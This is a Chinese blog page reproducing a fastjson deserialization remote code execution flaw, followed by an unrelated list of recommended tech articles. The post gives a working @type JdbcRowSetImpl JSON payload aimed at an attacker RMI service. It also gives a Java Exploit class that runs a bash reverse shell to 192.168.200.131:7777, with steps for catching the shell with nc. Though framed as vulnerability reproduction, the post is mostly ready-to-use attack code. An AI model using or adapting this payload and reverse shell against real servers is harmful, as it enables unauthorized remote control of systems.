XXX_WXY
XXX_WXY

fastjson远程命令执行

fastjson远程代码执行

漏洞原因:fastjson在对json字符串反序列化的时候,会读取到@type的内容,将json内容反序列化为java对象并调用这个类的setter方法。

1、搭建rmi服务

直接利用jndi-exploit工具
fastjson远程命令执行_第1张图片

2、抓包改为POST。开启nc监听、发包

POST的json数据:

Content-Type: application/json
Content-Length: 你的数据长度

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"开的RMI服务",
        "autoCommit":true
    }
}

这里响应400不用管(环境原因)。vps上看到反弹shell是收到了的
fastjson远程命令执行_第2张图片
收到shell
fastjson远程命令执行_第3张图片

使用恶意文件反弹shell过程

// javac Exploit.java
import java.lang.Runtime;
import java.lang.Process;
 
public class Exploit {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.200.131/7777 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

具体过程和log4j2一样。
可以看看上一篇文章
log4j2漏洞复现

你可能感兴趣的:(信息安全,网络安全,安全,web安全,信息安全,java)

  • 聚焦大模型!隐语技术团队研究成果被 ICASSP 与 ICLR 两大顶会收录 隐私开源模型
    “隐语”是开源的可信隐私计算框架,内置MPC、TEE、同态等多种密态计算虚拟设备供灵活选择,提供丰富的联邦学习算法和差分隐私机制。开源项目:https://github.com/secretflowhttps://gitee.com/secretflow导语:2023年,「大模型」走到了聚光灯下,技术圈的“头部玩家”们纷纷入场,其潜能和价值正在被不断挖掘与释放。与此同时,大模型相关的隐私安全问题也
  • 聊聊PowerJob的ThreadPoolConfig powerjob
    序本文主要研究一下PowerJob的ThreadPoolConfigThreadPoolConfigtech/powerjob/server/config/ThreadPoolConfig.java@Slf4j@EnableAsync@ConfigurationpublicclassThreadPoolConfig{@Bean(PJThreadPool.TIMING_POOL)publicTask
  • Node.js 环境搭建指南(手动下载并安装Node.js) MAX_WT node.js服务器javascript
    在服务器上部署Node.js环境是开发全栈应用、运行JavaScript服务端代码的基础步骤。本文将详细介绍如何在Linux服务器上搭建Node.js环境,并验证其是否正常运行。本文适合初学者和有一定经验的开发者参考。一、服务器环境准备1.添加GitHubHosts由于某些网络环境下访问GitHub可能较慢或不稳定,我们可以通过修改/etc/hosts文件来加速访问。操作步骤:1.使用vi编辑器打
  • 解决 `‘npm‘ 不是内部或外部命令` 的步骤 王大师王文峰 Java基础到框架面经吐血整理编程利器IDEAnpm前端node.js
    本人详解作者:王文峰,参加过CSDN2020年度博客之星,《Java王大师王天师》公众号:JAVA开发王大师,专注于天道酬勤的Java开发问题中国国学、传统文化和代码爱好者的程序人生,期待你的关注和支持!本人外号:神秘小峯山峯转载说明:务必注明来源(注明:作者:王文峰哦)解决`'npm'不是内部或外部命令`的步骤学习教程(传送门)解决`'npm'不是内部或外部命令`的步骤1.**确认是否已安装No
  • 30岁了,零基础想转行网安从头开始现实吗? 白帽黑客勇哥 人工智能网络web安全网络安全python
    为什么30岁转行网安是现实的?1.网络安全需求不断增长网络安全这一行业在过去几年中增长非常迅速,原因是互联网发展带来了巨大的数据和信息泄露风险。几乎所有的行业,尤其是金融、电商、医疗、政府等领域,都在面临严峻的网络安全挑战。无论是大公司还是中小企业,都急需网络安全专家来防范黑客攻击、数据泄露以及其他各种网络威胁。这样的背景使得网络安全领域一直是个朝阳行业,需求巨大,人才紧缺。2.年龄不是问题在许多
  • SpringBoot (看完就懂) 刘小炮吖i Java后端开发面试题Javaspringboot后端java面试spring职场和发展开发语言
    一、到底什么是SpringBoot?很多初学者在接触Java开发时,常常会听到SpringBoot这个词,但却对它的概念和作用感到模糊。简单来说,SpringBoot是由Pivotal团队开发的一个基于Spring框架的开源框架,它的主要目标是简化Spring应用的初始搭建以及开发过程。在传统的Spring项目开发中,开发者需要进行大量的配置工作,例如配置Servlet容器、配置各种Bean的依赖
  • Python Web 开发:利用 FastAPI 构建 OAuth2 授权与认证系统 Switch616 PythonWebpython前端fastapi数据库开发语言sql
    PythonWeb开发:利用FastAPI构建OAuth2授权与认证系统目录OAuth2协议概述与工作原理FastAPI中实现OAuth2登录的基础流程在FastAPI中集成Google登录(OAuth2)使用GitHub登录与FastAPIOAuth2集成OAuth2Token的管理与认证⚙️OAuth2授权的安全性考量与最佳实践1.OAuth2协议概述与工作原理OAuth2(开放授权2.0)是
  • JavaScript 简介 强强学习 javascript开发语言ecmascript
    JavaScript是互联网上最流行的脚本语言,这门语言可用于HTML和web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备。JavaScript是脚本语言JavaScript是一种轻量级的编程语言。JavaScript是可插入HTML页面的编程代码。JavaScript插入HTML页面后,可由所有的现代浏览器执行。JavaScript很容易学习。
  • html元素后追加内容,jquery 元素控制(追加元素/追加内容)介绍及应用 王大明白 html元素后追加内容
    一、在元素内部/外部追加元素append,prepend:添加到子元素before,after:作为兄弟元素添加html:在我的后面追加一条新闻Javascript:jQuery(function(){//在元素内部追加内容$("#content").append("姚明退役了...");})在#content里面添加元素,这是把姚明退役了...作为子元素添加到#content,如果想在元素外部追
  • canvas 添加html元素,给canvas添加内容 云舞空城 canvas添加html元素
    画布是一个矩形区域,您可以控制其每一像素。canvas拥有多种绘制路径、矩形、圆形、字符以及添加图像的方法。创建Canvas元素向HTML5页面添加canvas元素。规定元素的id、宽度和高度:通过JavaScript来绘制canvas元素本身是没有canvas画布与画布内容都缩小如何实现?如何将canvas复制给另外一个canvascanvas怎么根据坐标获取上面的内容html5canvas清除
  • 无线工业物联数据交互优化方案,基于巨控GRM240 何工13763355074 巨控GRM240巨控GRM230GRM241Q-4D4I4Q
    无线工业物联数据交互优化方案1.方案背景与技术优势广州巨控科技深耕工业物联领域十余年,依托4G+边缘计算技术打造新一代无线传输体系。针对化工行业防爆、长距离传输及信号干扰等痛点,本方案采用多重隔离架构与动态加密协议,确保数据在复杂工业环境下的完整性与安全性。相比传统有线方案,部署效率提升80%,运维成本降低76%。2.客户场景与核心需求目标场景:A/B/C/D四区部署485流量计(10台)及液位计
  • 交换机NAC配置与管理详解 wespten 网络协议栈网络设备5G物联网网络工具开发计算机网络
    1、NAC简介在计算机网络安全管理中,用户的网络接入控制(NAC)是必须充分考虑的一件大事,因为现在的网络安全隐患主要不是来自外网,而是内网。而在用户接入控制方面,最直接、最有效的方法就是基于接入设备接口的各种用户认证方法。在华为交换机中NAC包括802.1x认证、MAC认证与Portal认证,都是采用如下图所示的认证模型。它包括用户(User)、网络接入设备(NAD)和接入控制服务器(ACS)三
  • 计算机学习建议 qincjun 学习
    对于现代得计算机开发者而言;最快的是要见到成效;这是一个功利性的社会;对于99%的人来说,先保证自己可以在社会上活下去才是最重要的;而不是追求梦想;一、职业Web前端:HTML、CSS、JavaScript、Vue3框架、React框架等;客户端:C#后端:(C语言、C++)或者Java数据库:MySQL之类的数据库操作;算法工程师:算法相关书籍;架构师:Linux相关;并做过前后端请一定要想好去
  • Java实习生常规技术面试题每日十题Java基础(五) 用户昵称23 面试阿里巴巴java开发语言jvmhtmlgolang
    目录1.启动一个线程是用run()还是start()?.?2.线程的基本状态以及状态之间的关系。3.Set和List的区别,List和Map的区别?4.同步方法、同步代码块区别?5.描述Java锁机制。6.Comparable和Comparator接口是干什么的?列出它们的区别7.Java集合类框架的最佳实践有哪些?8.HashMap和Hashtable的区别。
  • Redis数据类型有哪些 头孢头孢 零散面试相关的总结redis哈希算法数据库
    Redis底层数据类型及其实现原理详细解析Redis提供了多种底层数据类型,每种类型都基于不同的数据结构实现,适用于不同的应用场景。理解这些底层实现和它们的使用方式对于优化Redis性能至关重要。以下是Redis中常用的底层数据类型的详细介绍,包括底层实现原理以及一些常用的Java代码示例。1.字符串(String)1.1数据类型描述Redis中的字符串(String)是最基本的数据类型,它可以存
  • 网络接入控制(NAC) S0linteeH 网络
    NAC网络安全解决方案角度考虑内部网络安全,通过对接入用户进行安全控制,提供“端到端”的安全保证。借助于NAC方案,实现“只有合法的用户、安全的终端才可以接入网络”,隔离非法、不安全的用户和终端,或者仅允许他们访问受限的资源。以此来提升整个网络的安全防护能力。为什么需要网络接入控制?在传统的园区网络建设思路中,一般认为园区内部网络是安全的,安全威胁主要来自外界。因此各种安全措施基本上都围绕着如何抵
  • 企业文件安全管理中的数据加密与权限控制实践探讨 够快云库 企业数据安全企业文件安全
    在数字化时代,企业数据安全已成为保障业务稳定与持续发展的基石。面对日益复杂的网络威胁和数据泄露风险,如何通过有效的数据加密与权限控制技术保护文件安全,成为企业IT和信息化负责人亟待解决的重要课题。一、数据加密技术的重要性传输加密在文件传输过程中,利用SSL/TLS等加密协议,可有效防止中间人攻击,确保数据在网络传输中的安全性。存储加密对静态文件进行AES、RSA等加密处理,即使存储介质被非法获取,
  • Java 初学者如何学习 Java?(分享自身学习经历) 爱学习Java的靓女
    因为我一开始也是通过知乎学习的,所以和同学们分享下我自学java成功的经历。首先我从我自己的学习经历说起,然后谈一下自己对学习java的看法和建议。这对于初学者来说才是有帮助的,希望大家可以吸取一些对自己有用的东西。1本科的脚踏实地高考之后填志愿,那时候其实我也不懂,就觉得电子信息工程好像还不错,于是就填了。在大学四年,除了学校学了C语言之外,我没有学习任何第二门编程语言,而且C语言也只是初级的水
  • 供应链协作中的文件安全风险,企业如何防范数据泄露? 够快云库 企业数据安全企业文件安全
    2025年,全球供应链正加速数字化转型,大量企业通过云平台、协作工具与供应商共享订单、合同、设计文件等关键数据。然而,超过65%的企业在与供应商协作时遭遇过数据泄露问题,供应链成为企业文件安全的“短板”。典型案例:2025年2月,一家全球知名汽车制造商在与外包厂商共享电池供应链数据时,因安全协议漏洞,导致核心设计方案外泄,竞争对手迅速推出相似产品,直接造成3亿美元的损失。在供应链协作过程中,企业机
  • 企业文件安全管理基础及防范策略 够快云库 企业数据安全企业文件安全
    随着信息化进程的不断推进,企业在数字化转型过程中面临大量敏感数据的存储与传输问题。文件作为企业核心数据的载体,其安全性直接关系到企业的信息安全和业务连续性。因此,构建科学严谨的文件安全管理体系显得尤为关键。一、文件安全管理的重要性数据泄露风险企业内部员工、外部攻击者或第三方供应商的不当操作均可能导致敏感文件泄露,给企业带来巨大经济与信誉损失。法律合规要求随着GDPR、ISO27001等数据保护法规
  • 网络安全风险与防范方法 赵谨言 文档网络安全windows
    网络安全风险与防范方法通过这些事件,我们可以看到风靡全球的勒索病毒、各种手段的入侵、防不胜防的个人信息泄露等网络安全事件让我国网络安全面临层出不穷的新问题。维护网络安全是全社会共同责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。只有把网络安全意识上升并贯彻到全社会的层面中,以下为常见的网络安全风险与防范方法。一、计算机病毒主要传播方式:网页挂马传播:用户不小心访问了恶意的或被攻
  • 分享一些处理复杂HTML结构的经验 数据小爬虫@ html前端
    在处理复杂HTML结构时,尤其是使用Java爬虫和Jsoup进行数据抓取时,以下是一些实用的经验和技巧,可以帮助你更高效地解析和提取数据:1.缩小解析范围对于复杂的HTML结构,尽量缩小解析范围,只解析所需的元素。使用CSS选择器来定位所需的元素,而不是对整个文档进行解析。2.使用Jsoup的选择器功能Jsoup提供了强大的选择器功能,可以用来处理嵌套的DOM元素。例如,你可以使用select方法
  • 人工智障的软件开发-自动流水线CI/CD篇-docker+jenkins部署之道 Yuanymoon 人工智障2077系列devopsjenkinsci/cddockerjenkinsai
    指令接收:「需要自动构建系统」系统检测:目标开发一个软件已完成代码仓库-轻盈的gitea,开始添加自动流水线启动应急冷却协议:准备承受Java系应用的资源冲击核心组件锁定:构建老将军Jenkins(虽然年迈但依然能战)需求分析:论碳基生物的认知进化人类需求翻译矩阵表层需求:“写一个软件”实际需求:“写代码并自动完成测试/打包/部署的流水线,最后自动部署一个系统哟”隐藏需求:“想要偷懒又不想承认的自
  • Java基于Java的酒店管理系统的设计与实现(开题+源码) 笔文程序设计 java开发语言
    本系统(程序+源码)带文档lw万字以上文末可获取一份本项目的java源码和数据库参考。系统程序文件列表开题报告内容研究背景:随着科技的发展和信息化的加速,酒店管理系统已经成为酒店运营不可或缺的一部分。过去,酒店通常采用传统的手动方式来管理客户信息、客房预订和入住登记等,这种方式不仅效率低下,而且容易出错。为了提高酒店的运营效率和服务质量,我们需要设计并实现一个基于Java的酒店管理系统。意义:通过
  • 【Redis系列】Redis安装与使用 m0_74825409 面试学习路线阿里巴巴redis数据库缓存
    ???欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。推荐:kwan的首页,持续学习,不断总结,共同进步,活到老学到老导航檀越剑指大厂系列:全面总结java核心技术点,如集合,jvm,并发编程redis,kafka,Spring,微服务,Netty等常用开发工具系列:罗列常用的开发工具,如IDE
  • 《On Java进阶卷》阅读笔记(二) m0_74823317 面试学习路线阿里巴巴java笔记python
    第3章集合主题List的行为:List是除数组之外最基本的对象存储和检索方式,基本操作如下:add()用于插入元素get()用于随机访问元素,这个操作在特定的List的实现成本不同iterator()用于返回该序列上的iteratorstream()用于生成序列中元素的StreamSet的行为:Set的意义在于测试成员身份,也可以用于删除重复元素。HashSet的输出是没有明显的顺序TreeSet
  • Aerospike 小的~~ nosqlAerospike
    文章来源:拉勾教育Java高薪训练营第3期Aerospike介绍Aerospike(简称AS)是一个分布式,可扩展的键值存储的NoSQL数据库。T级别大数据高并发的结构化数据存储读写操作达微妙级,99%的响应可在1毫秒内实现采用混合架构,索引存储在内存中,而数据可存储在机械硬盘(HDD)或固态硬盘(SSD)上(也可存储在内存)AS内部在访问SSD屏蔽了文件系统层级,直接访问地址,保证了数据的读取速
  • 前端面试题常考汇总1 RayFars 前端
    JS部分1.解释JavaScript中的闭包,并举例说明其应用场景闭包是指函数能够记住并访问它的词法作用域,即使这个函数在词法作用域之外执行。应用场景:数据隐藏:通过闭包,可以创建私有变量,只通过特定的函数来访问和修改这些变量。回调函数和事件处理:闭包常用于设置回调函数,因为回调函数需要访问其外部函数的变量。functioncreateCounter(){letcount=0;returnfunc
  • JavaSE基础及面试 浩哲Zhe Java知识体系构建java
    JavaSE整理总结结构:问题(问题关键字)回答问题关键字可以取消,以后目录和题目结构要认真组织。Java的知识体系包含哪些内容?拓展拓展如何打开远程桌面连接?通过“运行”对话框打开:按下Windows键+R,打开“运行”对话框。输入“mstsc”并按回车,这将打开远程桌面连接窗口。VisualStudio中的多行注释快捷键是什么?ctrl+shift+/二进制-1的原码、补码、反码分别是什么?-
  • RPC框架Dubbo深入分析 radcb55226 程序员rpcdubbo网络协议
    《一线大厂Java面试题解析+核心总结学习笔记+最新讲解视频+实战项目源码》,点击传送门,即可获取!依赖于Zookeeper的稳定性Redis支持基于客户端双写的集群方式,性能高要求服务器时间同步,用于检查心跳过期脏数据Multicast去中心化,不需要安装注册中心依赖于网络拓普和路由,跨机房有风险SimpleDogfooding,注册中心本身也是一个标准的RPC服务没有集群支持,可能单点故障cl
  • 解线性方程组 qiuwanchi
    package gaodai.matrix; import java.util.ArrayList; import java.util.List; import java.util.Scanner; public class Test { public static void main(String[] args) { Scanner scanner = new Sc
  • 在mysql内部存储代码 annan211 性能mysql存储过程触发器
    在mysql内部存储代码 在mysql内部存储代码,既有优点也有缺点,而且有人倡导有人反对。 先看优点: 1 她在服务器内部执行,离数据最近,另外在服务器上执行还可以节省带宽和网络延迟。 2 这是一种代码重用。可以方便的统一业务规则,保证某些行为的一致性,所以也可以提供一定的安全性。 3 可以简化代码的维护和版本更新。 4 可以帮助提升安全,比如提供更细
  • Android使用Asynchronous Http Client完成登录保存cookie的问题 hotsunshine android
    Asynchronous Http Client是android中非常好的异步请求工具 除了异步之外还有很多封装比如json的处理,cookie的处理 引用 Persistent Cookie Storage with PersistentCookieStore This library also includes a PersistentCookieStore whi
  • java面试题 Array_06 java面试
    java面试题 第一,谈谈final, finally, finalize的区别。 final-修饰符(关键字)如果一个类被声明为final,意味着它不能再派生出新的子类,不能作为父类被继承。因此一个类不能既被声明为 abstract的,又被声明为final的。将变量或方法声明为final,可以保证它们在使用中不被改变。被声明为final的变量必须在声明时给定初值,而在以后的引用中只能
  • 网站加速 oloz 网站加速
    前序:本人菜鸟,此文研究总结来源于互联网上的资料,大牛请勿喷!本人虚心学习,多指教. 1、减小网页体积的大小,尽量采用div+css模式,尽量避免复杂的页面结构,能简约就简约。 2、采用Gzip对网页进行压缩;    GZIP最早由Jean-loup Gailly和Mark Adler创建,用于UNⅨ系统的文件压缩。我们在Linux中经常会用到后缀为.gz
  • 正确书写单例模式 随意而生 java 设计模式 单例
      单例模式算是设计模式中最容易理解,也是最容易手写代码的模式了吧。但是其中的坑却不少,所以也常作为面试题来考。本文主要对几种单例写法的整理,并分析其优缺点。很多都是一些老生常谈的问题,但如果你不知道如何创建一个线程安全的单例,不知道什么是双检锁,那这篇文章可能会帮助到你。   懒汉式,线程不安全   当被问到要实现一个单例模式时,很多人的第一反应是写出如下的代码,包括教科书上也是这样
  • 单例模式 香水浓 java
    懒汉  调用getInstance方法时实例化 public class Singleton { private static Singleton instance; private Singleton() {} public static synchronized Singleton getInstance() { if(null == ins
  • 安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" AdyZhang apachehttp server
    安装Apache问题:系统找不到指定的文件 No installed service named "Apache2" 每次到这一步都很小心防它的端口冲突问题,结果,特意留出来的80端口就是不能用,烦。 解决方法确保几处: 1、停止IIS启动 2、把端口80改成其它 (譬如90,800,,,什么数字都好) 3、防火墙(关掉试试) 在运行处输入 cmd 回车,转到apa
  • 如何在android 文件选择器中选择多个图片或者视频? aijuans android
    我的android app有这样的需求,在进行照片和视频上传的时候,需要一次性的从照片/视频库选择多条进行上传 但是android原生态的sdk中,只能一个一个的进行选择和上传。 我想知道是否有其他的android上传库可以解决这个问题,提供一个多选的功能,可以使checkbox之类的,一次选择多个 处理方法 官方的图片选择器(但是不支持所有版本的androi,只支持API Level
  • mysql中查询生日提醒的日期相关的sql baalwolf mysql
    SELECT sysid,user_name,birthday,listid,userhead_50,CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')),CURDATE(),  dayofyear( CONCAT(YEAR(CURDATE()),DATE_FORMAT(birthday,'-%m-%d')))-dayofyear(
  • MongoDB索引文件破坏后导致查询错误的问题 BigBird2012 mongodb
    问题描述: MongoDB在非正常情况下关闭时,可能会导致索引文件破坏,造成数据在更新时没有反映到索引上。 解决方案:   使用脚本,重建MongoDB所有表的索引。 var names = db.getCollectionNames(); for( var i in names ){ var name = names[i]; print(name);
  • Javascript Promise bijian1013 JavaScriptPromise
            Parse JavaScript SDK现在提供了支持大多数异步方法的兼容jquery的Promises模式,那么这意味着什么呢,读完下文你就了解了。 一.认识Promises         “Promises”代表着在javascript程序里下一个伟大的范式,但是理解他们为什么如此伟大不是件简
  • [Zookeeper学习笔记九]Zookeeper源代码分析之Zookeeper构造过程 bit1129 zookeeper
       Zookeeper重载了几个构造函数,其中构造者可以提供参数最多,可定制性最多的构造函数是     public ZooKeeper(String connectString, int sessionTimeout, Watcher watcher, long sessionId, byte[] sessionPasswd, boolea
  • 【Java命令三】jstack bit1129 jstack
    jstack是用于获得当前运行的Java程序所有的线程的运行情况(thread dump),不同于jmap用于获得memory dump   [hadoop@hadoop sbin]$ jstack Usage: jstack [-l] <pid> (to connect to running process) jstack -F
  • jboss 5.1启停脚本 动静分离部署 ronin47
    以前启动jboss,往各种xml配置文件,现只要运行一句脚本即可。start nohup sh /**/run.sh -c servicename  -b ip -g  clustername   -u broatcast jboss.messaging.ServerPeerID=int  -Djboss.service.binding.set=p
  • UI之如何打磨设计能力? brotherlamp UIui教程ui自学ui资料ui视频
      在越来越拥挤的初创企业世界里,视觉设计的重要性往往可以与杀手级用户体验比肩。在许多情况下,尤其对于 Web 初创企业而言,这两者都是不可或缺的。前不久我们在《右脑革命:别学编程了,学艺术吧》中也曾发出过重视设计的呼吁。如何才能提高初创企业的设计能力呢?以下是 9 位创始人的体会。 1.找到自己的方式 如果你是设计师,要想提高技能可以去设计博客和展示好设计的网站如D-lists或
  • 三色旗算法 bylijinnan java算法
    import java.util.Arrays; /** 问题: 假设有一条绳子,上面有红、白、蓝三种颜色的旗子,起初绳子上的旗子颜色并没有顺序, 您希望将之分类,并排列为蓝、白、红的顺序,要如何移动次数才会最少,注意您只能在绳 子上进行这个动作,而且一次只能调换两个旗子。 网上的解法大多类似: 在一条绳子上移动,在程式中也就意味只能使用一个阵列,而不使用其它的阵列来
  • 警告:No configuration found for the specified action: \'s chiangfai configuration
    1.index.jsp页面form标签未指定namespace属性。 <!--index.jsp代码--> <%@taglib prefix="s" uri="/struts-tags"%> ... <s:form action="submit" method="post"&g
  • redis -- hash_max_zipmap_entries设置过大有问题 chenchao051 redishash
    使用redis时为了使用hash追求更高的内存使用率,我们一般都用hash结构,并且有时候会把hash_max_zipmap_entries这个值设置的很大,很多资料也推荐设置到1000,默认设置为了512,但是这里有个坑   #define ZIPMAP_BIGLEN 254 #define ZIPMAP_END 255     /* Return th
  • select into outfile access deny问题 daizj mysqltxt导出数据到文件
    本文转自:http://hatemysql.com/2010/06/29/select-into-outfile-access-deny%E9%97%AE%E9%A2%98/ 为应用建立了rnd的帐号,专门为他们查询线上数据库用的,当然,只有他们上了生产网络以后才能连上数据库,安全方面我们还是很注意的,呵呵。 授权的语句如下: grant select on armory.* to rn
  • phpexcel导出excel表简单入门示例 dcj3sjt126com PHPExcelphpexcel
    <?php error_reporting(E_ALL); ini_set('display_errors', TRUE); ini_set('display_startup_errors', TRUE);   if (PHP_SAPI == 'cli') die('This example should only be run from a Web Brows
  • 美国电影超短200句 dcj3sjt126com 电影
    1. I see. 我明白了。2. I quit! 我不干了!3. Let go! 放手!4. Me too. 我也是。5. My god! 天哪!6. No way! 不行!7. Come on. 来吧(赶快)8. Hold on. 等一等。9. I agree。 我同意。10. Not bad. 还不错。11. Not yet. 还没。12. See you. 再见。13. Shut up!
  • Java访问远程服务 dyy_gusi httpclientwebservicegetpost
        随着webService的崛起,我们开始中会越来越多的使用到访问远程webService服务。当然对于不同的webService框架一般都有自己的client包供使用,但是如果使用webService框架自己的client包,那么必然需要在自己的代码中引入它的包,如果同时调运了多个不同框架的webService,那么就需要同时引入多个不同的clien
  • Maven的settings.xml配置 geeksun settings.xml
    settings.xml是Maven的配置文件,下面解释一下其中的配置含义: settings.xml存在于两个地方: 1.安装的地方:$M2_HOME/conf/settings.xml 2.用户的目录:${user.home}/.m2/settings.xml 前者又被叫做全局配置,后者被称为用户配置。如果两者都存在,它们的内容将被合并,并且用户范围的settings.xml优先。
  • ubuntu的init与系统服务设置 hongtoushizi ubuntu
    转载自:  http://iysm.net/?p=178 init Init是位于/sbin/init的一个程序,它是在linux下,在系统启动过程中,初始化所有的设备驱动程序和数据结构等之后,由内核启动的一个用户级程序,并由此init程序进而完成系统的启动过程。 ubuntu与传统的linux略有不同,使用upstart完成系统的启动,但表面上仍维持init程序的形式。 运行
  • 跟我学Nginx+Lua开发目录贴 jinnianshilongnian nginxlua
    使用Nginx+Lua开发近一年的时间,学习和实践了一些Nginx+Lua开发的架构,为了让更多人使用Nginx+Lua架构开发,利用春节期间总结了一份基本的学习教程,希望对大家有用。也欢迎谈探讨学习一些经验。    目录 第一章 安装Nginx+Lua开发环境 第二章 Nginx+Lua开发入门 第三章 Redis/SSDB+Twemproxy安装与使用 第四章 L
  • php位运算符注意事项 home198979 位运算PHP&
    $a = $b = $c = 0; $a & $b = 1; $b | $c = 1  问a,b,c最终为多少?   当看到这题时,我犯了一个低级错误,误 以为位运算符会改变变量的值。所以得出结果是1 1 0 但是位运算符是不会改变变量的值的,例如: $a=1;$b=2; $a&$b;  这样a,b的值不会有任何改变
  • Linux shell数组建立和使用技巧 pda158 linux
    1.数组定义   [chengmo@centos5 ~]$ a=(1 2 3 4 5)   [chengmo@centos5 ~]$ echo $a   1   一对括号表示是数组,数组元素用“空格”符号分割开。    2.数组读取与赋值   得到长度:   [chengmo@centos5 ~]$ echo ${#a[@]}   5   用${#数组名[@或
  • hotspot源码(JDK7) ol_beta javaHotSpotjvm
    源码结构图,方便理解:   ├─agent                            Serviceab
  • Oracle基本事务和ForAll执行批量DML练习 vipbooks oraclesql
    基本事务的使用: 从账户一的余额中转100到账户二的余额中去,如果账户二不存在或账户一中的余额不足100则整笔交易回滚 select * from account; -- 创建一张账户表 create table account( -- 账户ID id number(3) not null, -- 账户名称 nam
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他